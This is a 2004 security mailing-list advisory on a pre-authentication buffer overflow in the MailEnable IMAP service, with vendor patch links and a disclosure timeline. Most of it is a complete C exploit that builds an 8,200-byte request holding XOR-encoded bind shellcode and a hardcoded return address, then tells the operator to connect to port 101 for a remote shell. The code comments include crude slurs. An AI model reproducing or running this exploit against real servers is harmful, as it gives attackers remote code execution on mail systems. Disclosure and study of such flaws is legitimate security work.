Date: 29 Nov 2004 10:53:36 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [NT] MailEnable IMAP Service Remote Buffer Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MailEnable IMAP Service Remote Buffer Overflow
------------------------------------------------------------------------
SUMMARY
" <http://www.mailenable.com>; MailEnable's Mail Server software provides a
powerful, scalable hosted messaging platform for Microsoft Windows. The
software is reliable, affordable and has all of the features of a
professional high performance mail server without the complexity or cost."
Two vulnerabilities were discovered in MailEnable's IMAP service including
a stack based buffer overflow and an object pointer overwrite, both can
lead to remote execution of arbitrary code.
DETAILS
Vulnerable Systems:
* MailEnable Professional Edition version 1.52
* MailEnable Enterprise Edition version 1.01
Immune Systems:
* MailEnable (All) with patch supplied by vendor
A stack based overflow was found in MailEnable's IMAP service which allows
remote execution of arbitrary code on the server machine. The stack based
overflow is caused due to an inappropriate bounds checking of the input
buffer. Sending a request of more than 8198 bytes will overwrite the stack
buffer.
It should be noted that this vulnerability can be triggered before any
kind of authentication is performed, making it extremely easy to exploit
remotely. A proof of concept exploit code is provided below.
Patch Availability:
The vendor has released a patch to mitigate this vulnerability and the
second, object pointer vulnerability. It can be downloaded from:
<http://mailenable.com/hotfix/MEIMAPS-HF041125.zip>;
http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
Disclosure Timeline:
24 November 2004 - Vendor informed
24 November 2004 - Initial response
25 November 2004 - Fix released
Proof Of Concept
/*
MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
Homepage : www.mailenable.com
Affected versions: Pro v1.52
Enterprise v1.01
Bug discovery : Nima Majidi at www.hat-squad.com
Exploit code : class101 at www.hat-squad.com
& dfind.kd-team.com
Fix : http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
Compilation : 101_ncat.cpp ......... Win32 (MSVC,cygwin)
101_ncat.c ........... Linux
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
file://BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
static char payload[10000];
char magikcll[]="\x7a\x8c\x01\x10"; file://CALL EDI - MEAISP.dll -
"Universal"
char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; file://long F0CK to them
void usage(char* us);
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
int main(int argc,char *argv[])
{
ver();
if
((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;}
#ifndef WIN32
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup
error\n");return -1;}
#endif
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=143;
if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro English\n[+]
Win2k SP4 Pro French\n[+] Win2k SP4 Server English\n[+] all Win2k, NT4
(supposed)";}
SOCKET s;fd_set mask;struct timeval timeout;struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1) {printf("[+] socket() error\n");return -1;}
printf("[+] target: %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
sizeA=8202-sizeof(scode);
sz=3+8198+4;
memset(payload,0,sizeof(payload));
strcat(payload,"\x41\x41\x41");
strcat(payload,scode);
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,target);
strcat(payload,"\r\n");
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending
error, the server prolly rebooted.");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
printf("[+] size of payload: %d\n",sz);
printf("[+] payload send, connect the port 101 to get a shell.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE: 101_mEna.exe Target Ip Port\n");
printf("TARGETS: \n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP4 Pro French (*)\n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. All Win2K, NT4 \n");
printf("NOTE: \n");
printf(" The port 143 is default if no port are specified\n");
printf(" The exploit bind a shellcode to the port 101\n");
printf(" A wildcard (*) mean Tested.\n");
return;
}
void ver()
{
printf("
\n");
printf("
===================================================[v0.1]====\n");
printf(" ======MailEnable, Pro Mail Server for Windows <=
v1.52=======\n");
printf(" ========IMAP Service, Remote Buffer Overflow
Exploit=========\n");
printf(" ======coded by class101=============[Hat-Squad.com
2004]=====\n");
printf("
=============================================================\n");
printf("
\n");
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:class101@gmail.com.> class
101.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
